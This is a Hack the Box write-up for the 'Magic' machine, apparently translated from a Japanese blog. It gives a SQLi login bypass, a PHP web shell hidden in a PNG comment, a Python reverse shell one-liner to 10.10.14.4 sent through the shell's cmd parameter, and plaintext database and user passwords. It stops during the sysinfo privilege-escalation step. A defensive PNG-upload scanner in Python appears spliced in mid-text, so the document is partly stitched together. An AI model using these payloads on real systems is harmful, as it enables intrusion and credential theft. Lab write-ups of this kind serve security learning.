[Hack the Box write-up] Magic

August 29, 2020

Introduction

I'm a Hack the Box beginner. If you have any corrections, additions or advice, please leave a comment or reach me on Twitter. さんぽし(@sanpo_shiho) | Twitter

Cheat sheet

I keep a cheat sheet of tool usage and similar notes at the link below; feel free to use it as a reference. github | sanposhiho/MYCHEATSHEET

About the machine

The difficulty is medium.

Among the medium machines, it is one of the easier ones.

nmap

kali@kali:~$ nmap -sC -sV 10.10.10.185 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 00:27 EDT
Nmap scan report for 10.10.10.185
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.92 seconds

Port 80

/index.php (screenshot)

/login.php (screenshot)

Logging in via SQLi

If you enter ' in the username field of the login form, it behaves differently from a failed login (specifically, it just sends you back to the login form).

Suspecting SQLi, I poked around for a while, and then:

Intercept the request in Burp and rewrite it as follows.

(screenshot of the rewritten request)

Now switch intercept off, and:

(screenshot of the result)

The login succeeds, and some kind of image upload screen appears.

Embedding PHP in the image's EXIF

I got pretty stuck after the SQLi, but

do you know an image can hide a lot of information? Maybe you just need the right tool.

this forum comment finally made it click (I had happened to see a similar EXIF-based challenge at a Recruit event a few days earlier...).

$ exiftool -Comment='<?php system($_REQUEST["cmd"]); ?>' test.png

This makes it take a query parameter called cmd and pass it to the shell.

Upload the image with a name like hoge.php.png (anything other than png is rejected).
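From the defender's side, the upload just described has two tells: a script extension hidden inside the file name, and a PHP open tag sitting in a PNG text chunk (exiftool stores -Comment on a PNG as a tEXt chunk keyed "Comment"). The scanner below is an added example written for this write-up, not code from the machine or its author; the sample PNGs it checks are constructed inline.

```python
import re
import struct
import zlib

# Constructed scanner for this write-up, not code from the machine or its author.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
ALLOWED_EXTS = {"png"}
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}


def iter_chunks(data):
    """Yield (type, payload) for every PNG chunk, verifying each chunk's CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("bad PNG signature")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if pos + 12 + length > len(data):
            raise ValueError("truncated chunk")
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) != crc:
            raise ValueError(f"corrupt {ctype.decode(errors='replace')} chunk")
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def chunk_text(ctype, payload):
    """Return (keyword, text) from a tEXt, zTXt or iTXt chunk, inflating if needed."""
    keyword, _, rest = payload.partition(b"\x00")
    if ctype == b"tEXt":
        return keyword, rest
    if ctype == b"zTXt":  # one byte of compression method, then a zlib stream
        return keyword, zlib.decompress(rest[1:])
    # iTXt: compression flag, compression method, language\0, translated keyword\0, text
    compressed = rest[0] == 1
    _lang, _, rest = rest[2:].partition(b"\x00")
    _tkey, _, text = rest.partition(b"\x00")
    return keyword, zlib.decompress(text) if compressed else text


def scan_upload(filename, data):
    """Return a list of findings for one upload; an empty list means nothing found."""
    findings = []
    parts = filename.lower().split(".")
    if parts[-1] not in ALLOWED_EXTS:
        findings.append(f"extension not allowed: {filename}")
    if set(parts[1:-1]) & SCRIPT_EXTS:
        # name.php.png: a handler matched on .php anywhere in the name (AddHandler,
        # or an unanchored FilesMatch) runs this as PHP despite the .png suffix
        findings.append(f"script extension hidden in name: {filename}")
    try:
        for ctype, payload in iter_chunks(data):
            if ctype not in TEXT_CHUNKS:
                continue
            keyword, text = chunk_text(ctype, payload)
            if PHP_OPEN_TAG.search(text):
                findings.append(f"PHP open tag in {ctype.decode()} chunk "
                                f"(keyword {keyword.decode(errors='replace')!r})")
    except (ValueError, IndexError, zlib.error) as exc:
        findings.append(f"malformed PNG: {exc}")
    return findings


def _chunk(ctype, payload):
    return (struct.pack(">I", len(payload)) + ctype + payload
            + struct.pack(">I", zlib.crc32(ctype + payload)))


def build_png(text_chunks):
    """Construct a minimal 1x1 RGB PNG carrying the given text chunks (test data)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black pixel
    body = _chunk(b"IHDR", ihdr)
    for ctype, payload in text_chunks:
        body += _chunk(ctype, payload)
    return PNG_SIGNATURE + body + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed samples: a benign comment, and the tEXt "Comment" chunk shape that
# exiftool -Comment=... produces, plus the same idea hidden in a compressed zTXt.
CLEAN_PNG = build_png([(b"tEXt", b"Comment\x00holiday photo")])
TEXT_WEBSHELL_PNG = build_png([(b"tEXt", b"Comment\x00<?php phpinfo(); ?>")])
ZTXT_WEBSHELL_PNG = build_png(
    [(b"zTXt", b"Comment\x00\x00" + zlib.compress(b"<?= phpinfo() ?>"))])

if __name__ == "__main__":
    for name, blob in [("holiday.png", CLEAN_PNG), ("test.php.png", TEXT_WEBSHELL_PNG)]:
        print(name, "->", scan_upload(name, blob) or "clean")
```

Checking only the final extension is what the box's upload form does; the real fix is to store uploads outside the web root or with PHP execution disabled for that directory, with this kind of content check as a second layer.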

Use gobuster to find out where the uploaded images end up.

kali@kali:~$ gobuster dir -u http://10.10.10.185/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/30 03:48:33 Starting gobuster
===============================================================
/login.php (Status: 200)
/index.php (Status: 200)
/images (Status: 301)
/assets (Status: 301)
/upload.php (Status: 302)
/logout.php (Status: 302)
/purple.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/05/30 04:32:59 Finished
===============================================================
kali@kali:~$ gobuster dir -u http://10.10.10.185/images/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40 -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.185/images/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/05/30 04:33:45 Starting gobuster
===============================================================
/uploads (Status: 301)
===============================================================
2020/05/30 05:18:29 Finished
===============================================================

/images/uploads looks suspicious.

Upload from the earlier screen,

then take this ↓

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

URL-encode it and access it as follows,

http://10.10.10.185/images/uploads/test.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.4%22,1212));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

and you get a shell.

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.185] 40024
/bin/sh: 0: can't access tty; job control turned off
$

Getting user

www-data@ubuntu:/$ cd /var/www/Magic
cd /var/www/Magic
www-data@ubuntu:/var/www/Magic$ ls
ls
assets   images     login.php   purple.php
db.php5  index.php  logout.php  upload.php
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont  = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont =  new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

I figured it would be the usual look-in-the-DB pattern, but the plain mysql command was not available.

www-data@ubuntu:/var/www/Magic$ ls -la /usr/bin/ | grep mysql
ls -la /usr/bin/ | grep mysql
-rwxr-xr-x  1 root root     3627200 Jan 21 06:10 mysql_config_editor
-rwxr-xr-x  1 root root    22558552 Jan 21 06:10 mysql_embedded
-rwxr-xr-x  1 root root     5179616 Jan 21 06:10 mysql_install_db
-rwxr-xr-x  1 root root     3616952 Jan 21 06:10 mysql_plugin
-rwxr-xr-x  1 root root     3784424 Jan 21 06:10 mysql_secure_installation
-rwxr-xr-x  1 root root     3653288 Jan 21 06:10 mysql_ssl_rsa_setup
-rwxr-xr-x  1 root root     3569976 Jan 21 06:10 mysql_tzinfo_to_sql
-rwxr-xr-x  1 root root     4442320 Jan 21 06:10 mysql_upgrade
-rwxr-xr-x  1 root root     3799752 Jan 21 06:10 mysqladmin
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqlanalyze -> mysqlcheck
-rwxr-xr-x  1 root root     4068280 Jan 21 06:10 mysqlbinlog
-rwxr-xr-x  1 root root     3825320 Jan 21 06:10 mysqlcheck
-rwxr-xr-x  1 root root       26952 Jan 21 06:10 mysqld_multi
-rwxr-xr-x  1 root root       28448 Jan 21 06:10 mysqld_safe
-rwxr-xr-x  1 root root     3875176 Jan 21 06:10 mysqldump
-rwxr-xr-x  1 root root        7865 Jan 21 06:10 mysqldumpslow
-rwxr-xr-x  1 root root     3791912 Jan 21 06:10 mysqlimport
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqloptimize -> mysqlcheck
-rwxr-xr-x  1 root root     4286120 Jan 21 06:10 mysqlpump
lrwxrwxrwx  1 root root          10 Jan 21 06:10 mysqlrepair -> mysqlcheck
-rwxr-xr-x  1 root root       39016 Jan 12  2018 mysqlreport
-rwxr-xr-x  1 root root     3790504 Jan 21 06:10 mysqlshow
-rwxr-xr-x  1 root root     3809512 Jan 21 06:10 mysqlslap
www-data@ubuntu:/var/www/Magic$

Looking at the list, mysqldump seems usable.

www-data@ubuntu:/var/www/Magic$ mysqldump --databases Magic -utheseus -piamkingtheseus
<qldump --databases Magic -utheseus -piamkingtheseus
mysqldump: [Warning] Using a password on the command line interface can be insecure.
-- MySQL dump 10.13  Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost    Database: Magic
-- ------------------------------------------------------
-- Server version       5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `Magic`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
  `id` int(6) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(100) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-05-29 23:43:16

INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng'); looks suspicious.

www-data@ubuntu:/var/www/Magic$ su theseus
su theseus
Password: Th3s3usW4sK1ng

theseus@ubuntu:/var/www/Magic$

I was able to switch to theseus. This gets user.

PE

Look for SUID files.

theseus@ubuntu:~$  find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/snap/core18/1223/bin/mount
/snap/core18/1223/bin/ping
/snap/core18/1223/bin/su
/snap/core18/1223/bin/umount
/snap/core18/1223/usr/bin/chfn
/snap/core18/1223/usr/bin/chsh
/snap/core18/1223/usr/bin/gpasswd
/snap/core18/1223/usr/bin/newgrp
/snap/core18/1223/usr/bin/passwd
/snap/core18/1223/usr/bin/sudo
/snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1223/usr/lib/openssh/ssh-keysign
/snap/core18/1668/bin/mount
/snap/core18/1668/bin/ping
/snap/core18/1668/bin/su
/snap/core18/1668/bin/umount
/snap/core18/1668/usr/bin/chfn
/snap/core18/1668/usr/bin/chsh
/snap/core18/1668/usr/bin/gpasswd
/snap/core18/1668/usr/bin/newgrp
/snap/core18/1668/usr/bin/passwd
/snap/core18/1668/usr/bin/sudo
/snap/core18/1668/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1668/usr/lib/openssh/ssh-keysign
/snap/core/8689/bin/mount
/snap/core/8689/bin/ping
/snap/core/8689/bin/ping6
/snap/core/8689/bin/su
/snap/core/8689/bin/umount
/snap/core/8689/usr/bin/chfn
/snap/core/8689/usr/bin/chsh
/snap/core/8689/usr/bin/gpasswd
/snap/core/8689/usr/bin/newgrp
/snap/core/8689/usr/bin/passwd
/snap/core/8689/usr/bin/sudo
/snap/core/8689/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8689/usr/lib/openssh/ssh-keysign
/snap/core/8689/usr/lib/snapd/snap-confine
/snap/core/8689/usr/sbin/pppd
/snap/core/7917/bin/mount
/snap/core/7917/bin/ping
/snap/core/7917/bin/ping6
/snap/core/7917/bin/su
/snap/core/7917/bin/umount
/snap/core/7917/usr/bin/chfn
/snap/core/7917/usr/bin/chsh
/snap/core/7917/usr/bin/gpasswd
/snap/core/7917/usr/bin/newgrp
/snap/core/7917/usr/bin/passwd
/snap/core/7917/usr/bin/sudo
/snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7917/usr/lib/openssh/ssh-keysign
/snap/core/7917/usr/lib/snapd/snap-confine
/snap/core/7917/usr/sbin/pppd
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping

Hmm...?

Looking at sysinfo

This hint also came from the forum, but sysinfo is one of those commands that sounds like it should exist and doesn't, right? So it must be a custom command.

root@ubuntu:/tmp# sysinfo
sysinfo
====================Hardware Info====================
H/W path           Device      Class      Description
=====================================================
                               system     VMware Virtual Platform
/0                             bus        440BX Desktop Reference Platform
/0/0                           memory     86KiB BIOS
/0/1                           processor  AMD EPYC 7401P 24-Core Processor
/0/1/0                         memory     16KiB L1 cache
/0/1/1                         memory     16KiB L1 cache
/0/1/2                         memory     512KiB L2 cache
/0/1/3                         memory     512KiB L2 cache
/0/2                           processor  AMD EPYC 7401P 24-Core Processor
/0/28                          memory     System Memory
/0/28/0                        memory     4GiB DIMM DRAM EDO
/0/28/1                        memory     DIMM DRAM [empty]
/0/28/2                        memory     DIMM DRAM [empty]
/0/28/3                        memory     DIMM DRAM [empty]
/0/28/4                        memory     DIMM DRAM [empty]
/0/28/5                        memory     DIMM DRAM [empty]
/0/28/6                        memory     DIMM DRAM [empty]
/0/28/7                        memory     DIMM DRAM [empty]
/0/28/8                        memory     DIMM DRAM [empty]
/0/28/9                        memory     DIMM DRAM [empty]
/0/28/a                        memory     DIMM DRAM [empty]
/0/28/b                        memory     DIMM DRAM [empty]
/0/28/c                        memory     DIMM DRAM [empty]
/0/28/d                        memory     DIMM DRAM [empty]
/0/28/e                        memory     DIMM DRAM [empty]
/0/28/f                        memory     DIMM DRAM [empty]
/0/28/10                       memory     DIMM DRAM [empty]
/0/28/11                       memory     DIMM DRAM [empty]
/0/28/12                       memory     DIMM DRAM [empty]
/0/28/13                       memory     DIMM DRAM [empty]
/0/28/14                       memory     DIMM DRAM [empty]
/0/28/15                       memory     DIMM DRAM [empty]
/0/28/16                       memory     DIMM DRAM [empty]
/0/28/17                       memory     DIMM DRAM [empty]
/0/28/18                       memory     DIMM DRAM [empty]
/0/28/19                       memory     DIMM DRAM [empty]
/0/28/1a                       memory     DIMM DRAM [empty]
/0/28/1b                       memory     DIMM DRAM [empty]
/0/28/1c                       memory     DIMM DRAM [empty]
/0/28/1d                       memory     DIMM DRAM [empty]
/0/28/1e                       memory     DIMM DRAM [empty]
/0/28/1f                       memory     DIMM DRAM [empty]
/0/28/20                       memory     DIMM DRAM [empty]
/0/28/21                       memory     DIMM DRAM [empty]
/0/28/22                       memory     DIMM DRAM [empty]
/0/28/23                       memory     DIMM DRAM [empty]
/0/28/24                       memory     DIMM DRAM [empty]
/0/28/25                       memory     DIMM DRAM [empty]
/0/28/26                       memory     DIMM DRAM [empty]
/0/28/27                       memory     DIMM DRAM [empty]
/0/28/28                       memory     DIMM DRAM [empty]
/0/28/29                       memory     DIMM DRAM [empty]
/0/28/2a                       memory     DIMM DRAM [empty]
/0/28/2b                       memory     DIMM DRAM [empty]
/0/28/2c                       memory     DIMM DRAM [empty]
/0/28/2d                       memory     DIMM DRAM [empty]
/0/28/2e                       memory     DIMM DRAM [empty]
/0/28/2f                       memory     DIMM DRAM [empty]
/0/28/30                       memory     DIMM DRAM [empty]
/0/28/31                       memory     DIMM DRAM [empty]
/0/28/32                       memory     DIMM DRAM [empty]
/0/28/33                       memory     DIMM DRAM [empty]
/0/28/34                       memory     DIMM DRAM [empty]
/0/28/35                       memory     DIMM DRAM [empty]
/0/28/36                       memory     DIMM DRAM [empty]
/0/28/37                       memory     DIMM DRAM [empty]
/0/28/38                       memory     DIMM DRAM [empty]
/0/28/39                       memory     DIMM DRAM [empty]
/0/28/3a                       memory     DIMM DRAM [empty]
/0/28/3b                       memory     DIMM DRAM [empty]
/0/28/3c                       memory     DIMM DRAM [empty]
/0/28/3d                       memory     DIMM DRAM [empty]
/0/28/3e                       memory     DIMM DRAM [empty]
/0/28/3f                       memory     DIMM DRAM [empty]
/0/3                           memory
/0/3/0                         memory     DIMM [empty]
/0/4                           memory
/0/4/0                         memory     DIMM [empty]
/0/5                           memory
/0/5/0                         memory     DIMM [empty]
/0/6                           memory
/0/6/0                         memory     DIMM [empty]
/0/7                           memory
/0/7/0                         memory     DIMM [empty]
/0/8                           memory
/0/8/0                         memory     DIMM [empty]
/0/9                           memory
/0/9/0                         memory     DIMM [empty]
/0/a                           memory
/0/a/0                         memory     DIMM [empty]
/0/b                           memory
/0/b/0                         memory     DIMM [empty]
/0/c                           memory
/0/c/0                         memory     DIMM [empty]
/0/d                           memory
/0/d/0                         memory     DIMM [empty]
/0/e                           memory
/0/e/0                         memory     DIMM [empty]
/0/f                           memory
/0/f/0                         memory     DIMM [empty]
/0/10                          memory
/0/10/0                        memory     DIMM [empty]
/0/11                          memory
/0/11/0                        memory     DIMM [empty]
/0/12                          memory
/0/12/0                        memory     DIMM [empty]
/0/13                          memory
/0/13/0                        memory     DIMM [empty]
/0/14                          memory
/0/14/0                        memory     DIMM [empty]
/0/15                          memory
/0/15/0                        memory     DIMM [empty]
/0/16                          memory
/0/16/0                        memory     DIMM [empty]
/0/17                          memory
/0/17/0                        memory     DIMM [empty]
/0/18                          memory
/0/18/0                        memory     DIMM [empty]
/0/19                          memory
/0/19/0                        memory     DIMM [empty]
/0/1a                          memory
/0/1a/0                        memory     DIMM [empty]
/0/1b                          memory
/0/1b/0                        memory     DIMM [empty]
/0/1c                          memory
/0/1c/0                        memory     DIMM [empty]
/0/1d                          memory
/0/1d/0                        memory     DIMM [empty]
/0/1e                          memory
/0/1e/0                        memory     DIMM [empty]
/0/1f                          memory
/0/1f/0                        memory     DIMM [empty]
/0/20                          memory
/0/20/0                        memory     DIMM [empty]
/0/21                          memory
/0/21/0                        memory     DIMM [empty]
/0/22                          memory
/0/22/0                        memory     DIMM [empty]
/0/23                          memory
/0/23/0                        memory     DIMM [empty]
/0/24                          memory
/0/24/0                        memory     DIMM [empty]
/0/25                          memory
/0/25/0                        memory     DIMM [empty]
/0/26                          memory
/0/26/0                        memory     DIMM [empty]
/0/27                          memory
/0/27/0                        memory     DIMM [empty]
/0/29                          memory
/0/29/0                        memory     DIMM [empty]
/0/2a                          memory
/0/2a/0                        memory     DIMM [empty]
/0/2b                          memory
/0/2b/0                        memory     DIMM [empty]
/0/2c                          memory
/0/2c/0                        memory     DIMM [empty]
/0/2d                          memory
/0/2d/0                        memory     DIMM [empty]
/0/2e                          memory
/0/2e/0                        memory     DIMM [empty]
/0/2f                          memory
/0/2f/0                        memory     DIMM [empty]
/0/30                          memory
/0/30/0                        memory     DIMM [empty]
/0/31                          memory
/0/31/0                        memory     DIMM [empty]
/0/32                          memory
/0/32/0                        memory     DIMM [empty]
/0/33                          memory
/0/33/0                        memory     DIMM [empty]
/0/34                          memory
/0/34/0                        memory     DIMM [empty]
/0/35                          memory
/0/35/0                        memory     DIMM [empty]
/0/36                          memory
/0/36/0                        memory     DIMM [empty]
/0/37                          memory
/0/37/0                        memory     DIMM [empty]
/0/38                          memory
/0/38/0                        memory     DIMM [empty]
/0/39                          memory
/0/39/0                        memory     DIMM [empty]
/0/3a                          memory
/0/3a/0                        memory     DIMM [empty]
/0/3b                          memory
/0/3b/0                        memory     DIMM [empty]
/0/3c                          memory
/0/3c/0                        memory     DIMM [empty]
/0/3d                          memory
/0/3d/0                        memory     DIMM [empty]
/0/3e                          memory
/0/3e/0                        memory     DIMM [empty]
/0/3f                          memory
/0/3f/0                        memory     DIMM [empty]
/0/40                          memory
/0/40/0                        memory     DIMM [empty]
/0/41                          memory
/0/41/0                        memory     DIMM [empty]
/0/42                          memory
/0/42/0                        memory     DIMM [empty]
/0/43                          memory
/0/43/0                        memory     DIMM [empty]
/0/44                          memory
/0/45                          memory
/0/100                         bridge     440BX/ZX/DX - 82443BX/ZX/DX Host bridge
/0/100/1                       bridge     440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
/0/100/7                       bridge     82371AB/EB/MB PIIX4 ISA
/0/100/7.1                     storage    82371AB/EB/MB PIIX4 IDE
/0/100/7.3                     bridge     82371AB/EB/MB PIIX4 ACPI
/0/100/7.7                     generic    Virtual Machine Communication Interface
/0/100/f                       display    SVGA II Adapter
/0/100/10          scsi2       storage    53c1030 PCI-X Fusion-MPT Dual Ultra320 SCSI
/0/100/10/0.0.0    /dev/sda    disk       21GB Virtual disk
/0/100/10/0.0.0/1  /dev/sda1   volume     19GiB EXT4 volume
/0/100/11                      bridge     PCI bridge
/0/100/11/0                    bus        USB1.1 UHCI Controller
/0/100/11/0/1      usb2        bus        UHCI Host Controller
/0/100/11/0/1/1                input      VMware Virtual USB Mouse
/0/100/11/0/1/2                bus        VMware Virtual USB Hub
/0/100/11/1                    bus        USB2 EHCI Controller
/0/100/11/1/1      usb1        bus        EHCI Host Controller
/0/100/15                      bridge     PCI Express Root Port
/0/100/15/0        ens160      network    VMXNET3 Ethernet Controller
/0/100/15.1                    bridge     PCI Express Root Port
/0/100/15.2                    bridge     PCI Express Root Port
/0/100/15.3                    bridge     PCI Express Root Port
/0/100/15.4                    bridge     PCI Express Root Port
/0/100/15.5                    bridge     PCI Express Root Port
/0/100/15.6                    bridge     PCI Express Root Port
/0/100/15.7                    bridge     PCI Express Root Port
/0/100/16                      bridge     PCI Express Root Port
/0/100/16.1                    bridge     PCI Express Root Port
/0/100/16.2                    bridge     PCI Express Root Port
/0/100/16.3                    bridge     PCI Express Root Port
/0/100/16.4                    bridge     PCI Express Root Port
/0/100/16.5                    bridge     PCI Express Root Port
/0/100/16.6                    bridge     PCI Express Root Port
/0/100/16.7                    bridge     PCI Express Root Port
/0/100/17                      bridge     PCI Express Root Port
/0/100/17.1                    bridge     PCI Express Root Port
/0/100/17.2                    bridge     PCI Express Root Port
/0/100/17.3                    bridge     PCI Express Root Port
/0/100/17.4                    bridge     PCI Express Root Port
/0/100/17.5                    bridge     PCI Express Root Port
/0/100/17.6                    bridge     PCI Express Root Port
/0/100/17.7                    bridge     PCI Express Root Port
/0/100/18                      bridge     PCI Express Root Port
/0/100/18.1                    bridge     PCI Express Root Port
/0/100/18.2                    bridge     PCI Express Root Port
/0/100/18.3                    bridge     PCI Express Root Port
/0/100/18.4                    bridge     PCI Express Root Port
/0/100/18.5                    bridge     PCI Express Root Port
/0/100/18.6                    bridge     PCI Express Root Port
/0/100/18.7                    bridge     PCI Express Root Port
/0/46              scsi0       storage
/0/46/0.0.0        /dev/cdrom  disk       VMware IDE CDR00
/1                             system

====================Disk Info====================
Disk /dev/loop0: 44.9 MiB, 47063040 bytes, 91920 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop1: 3.7 MiB, 3825664 bytes, 7472 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop2: 3.7 MiB, 3862528 bytes, 7544 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop3: 89.1 MiB, 93454336 bytes, 182528 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop4: 44.2 MiB, 46325760 bytes, 90480 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop5: 956 KiB, 978944 bytes, 1912 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop6: 54.7 MiB, 57294848 bytes, 111904 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes


Disk /dev/loop7: 160.2 MiB, 167931904 bytes, 327992 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
